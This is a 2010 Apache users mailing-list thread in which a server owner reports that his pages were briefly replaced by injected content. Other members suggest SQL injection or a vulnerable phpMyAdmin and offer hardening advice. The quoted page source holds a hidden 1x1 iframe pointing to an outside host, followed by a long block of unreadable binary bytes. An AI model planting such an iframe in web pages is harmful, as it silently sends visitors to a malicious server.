httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Oleg Goryunov <oleg.goryu...@gmail.com>
Subject Re: [users@httpd] Someone hacked my apache2 server
Date Mon, 05 Apr 2010 20:06:59 GMT
Dan,
Thanks for the advice! I will note that.
Oleg.

2010/4/5 <Dan_Mitton@ymp.gov>

>
> Oleg,
>
> Some other things to check/do if you don't already know this...
>
> Be sure that the httpd process runs as a completely unprivileged user with
> nothing but read access to ANYTHING.
> Be sure that the content of your site is not owned by the same user as the
> httpd user.  Read only access should be through group, other or acl.
> Be sure that the apache config files, libraries, binaries, etc. are owned
> by as different user then the httpd process user.  Read and Execute access
> should be through group, other or acl.
>
> Same goes for MySQL and any other processes running on the machines.  The
> running processes should NOT have write access to their own config files.
>
> Try to think about the problem form the running processes perspective, if I
> was the httpd/mysql/etc. process, what can I hurt?  Get that to a minimum.
>
> If there is a buffer overflow problem somewhere, you might not be able to
> prevent the in memory running process from being hacked, but as long as they
> can't hack the files on the server(s), a quick stop/start or reboot should
> fix the problem.
>
> Good Luck!
>
> Dan
>
>
> Please respond to users@httpd.apache.org
>
> To:        users@httpd.apache.org
> cc:         (bcc: Dan Mitton/YD/RWDOE)
> Subject:        Re: [users@httpd] Someone hacked my apache2 server
>
> LSN: Not Relevant
> User Filed as: Not a Record
>
> Oh, ok. I got it. I have already disabled it (actually, immediately after
> the attack).
> Thanks for the advice. I appreciate!
> Oleg.
>
> On Sun, Apr 4, 2010 at 5:52 PM, Daniel Reinhardt <*cryptodan@cryptodan.net
> * <cryptodan@cryptodan.net>> wrote:
>
> --------------------------------------------------
> From: "Oleg Goryunov" <*oleg.goryunov@gmail.com* <oleg.goryunov@gmail.com>
> >
> Sent: 04 April, 2010 13:39
>
> To: <*users@httpd.apache.org* <users@httpd.apache.org>>
> Subject: Re: [users@httpd] Someone hacked my apache2 server
>
>
> Yes, there is a MySQL server. And actually, I noticed that - while the
> server was returning the mentioned hacked page, mysql process was on top of
> the list of the "top" command. Though, it took only 1.5% of the CPU.
> But, mysql is restricted to accept connections from outside world. It only
> listens on local socket.
> What kind of vulnarability does mysql have? Do you know where I can read
> about it?
> Oleg.
>
> On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <*cryptodan@cryptodan.net
> * <cryptodan@cryptodan.net>>wrote:
>
>
> --------------------------------------------------
> From: "Oleg Goryunov" <*oleg.goryunov@gmail.com* <oleg.goryunov@gmail.com>
> >
> Sent: 03 April, 2010 21:03
> To: <*users@httpd.apache.org* <users@httpd.apache.org>>
> Subject: [users@httpd] Someone hacked my apache2 server
>
>  Hello all,
> It looks like someone hacked my apache2 server and I am trying to
> understand
> how this could have happened.
> This is what happened:
> All of a sudden the server - in response to a web-browser request for a
> page
> - started to give a full screen of unknown characters (looked like a long
> text with encoding mismatch).
> The output was immediate and the same for all the web-sites located on the
> server.
> Looking at the page source of the output I see the following:
> =========
>
> <iframe src=  *http://azsxde55.9966.org:8800/ak47/29.html*<http://azsxde55.9966.org:8800/ak47/29.html>width=1
> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц
'█&q ┤I
> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь  З╩Ё√Уєул▀.^СЙM
> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
>
> ╖\I*┬Ё╒█А  k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ
ГГгн√╙"╤╛аr|
> 0┘ G й=  г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
> MЮeJ█n  ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦
╦ни╩ўю╫ЛЛє╦л
> JЪ█Й╥ ╥ I╩%7░К █o
>
> HШЙ5╧p}+г
> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟
∙lБ\B:e y
> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]°  ═─a`@Y6╬-┴ЎАа └
> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm
│.&cчВЩ cАqЧ
> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
>
> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с  ·~
> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ
ii(░8
> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^  A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^
э
> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS  ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha
:"V сг╞i ╖Z@
> Yў■ЕY,Р`- FE4Юa. ё Жv0и  Ї ^ЎdTуц┬A╬>t╨╡┘  ЩМ╩г╙є│W
}ё+▓ fUXЗўs  -wвR
> F░∙Н╕5▐d ░Ч╛▒
>
>
> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█   ╣н┌Г■{ х?ъ
> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m  ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx
 1°/л1xQщ╕
> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║  -д╚Ъ,i╔ТvЭ
¤╡"H пч¤Ў№°
> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖
 YR∙<} █ ю О╕д╥-q
> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>
> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа
&28
> ^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═
5  1▄ И Яєцц|  ─w▄oя
> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
> ╙v*чї8x~vётэow+v╨\ П ╥dJ!  │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.&
|  ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
> ¤
>
> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ >
Ж ?>  ы'ci
> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN
+бЇ>∙бч~ И;ўL
> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш
fa,VWэДZWА¤ЬГ.эЬ°]Х
> ▄щсМ├
>
> би╝9сй+╬B  A& ╔-ЧnдUX▒uu вF В )Odф
> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш
╪┤L
> SАД( │Б*D.GF* <http://d.gf/> <*http://d.gf/* <http://d.gf/>>Ц╟╫мм&╗Z3NvJ╣p
> шh╖w┬] ╦
>
> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>
> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1  З ёqо]П█rА
n:▀А╨
> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
>
> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨   х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q
╒j
> ╒╢B║  ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘
└Ю"ЛН┼LxЦA╪е╞н цмВY
> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a  ▓▐  69╖
  АoX;wц ыlэ╡s   YИLШ@
> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐  /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪
ф5X р
> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>
> ==================
> The address indicated in the begining of the page code leads to some
> chinese
> server.
> So, somehow it happened that the output of the apache server was
> substituted
> by this page, which redirected visitors to some chinese server.
>
> But the most strange thing was that the problem dissapeared itself! So, it
> last for 10 minutes then disappeared! And the again started and again
> dissapeared. Finally, I turned down apache untill I understand what is
> going
> on...
>
> Any idea how could that happen?  How to reproduce this? How to prevent?
> Where to look for logs? I have check both ssh logs and apache logs, there
> is
> nothing that could seem unusual there...
>
> Any help is appreciated.
> Oleg.
>
>
> Oleg,
>
> Are you running any sort of MySQL Database on this machine, and if so is it
> patched and fully updated along with any php scripts.  What you are showing
> us is indicative of a SQL Injection Attack.
>
> Shocked no one has mentioned especially with the rampant incline of the
> Russian Business Network to spread its malware through the use of SQL
> Injection on any vulnerable website.
>
> Thanks,
> Daniel
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:*http://httpd.apache.org/userslist.html*<http://httpd.apache.org/userslist.html>>
> for more info.
> To unsubscribe, e-mail: *users-unsubscribe@httpd.apache.org*<users-unsubscribe@httpd.apache.org>
>  "   from the digest: *users-digest-unsubscribe@httpd.apache.org*<users-digest-unsubscribe@httpd.apache.org>
> For additional commands, e-mail: *users-help@httpd.apache.org*<users-help@httpd.apache.org>
>
>
>
>
> Oleg,
>
> Its not a vulnerability with MySQL it is a vulnerable PHP Script such as an
> outdated PHPMyAdmin or PHPMyAdmin itself.  I hardly run it on my servers.  I
> would promptly disable it.
>
>
> Thanks,
> Daniel
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:*http://httpd.apache.org/userslist.html*<http://httpd.apache.org/userslist.html>>
> for more info.
> To unsubscribe, e-mail: *users-unsubscribe@httpd.apache.org*<users-unsubscribe@httpd.apache.org>
>  "   from the digest: *users-digest-unsubscribe@httpd.apache.org*<users-digest-unsubscribe@httpd.apache.org>
> For additional commands, e-mail: *users-help@httpd.apache.org*<users-help@httpd.apache.org>
>
>
>
>
Mime
View raw message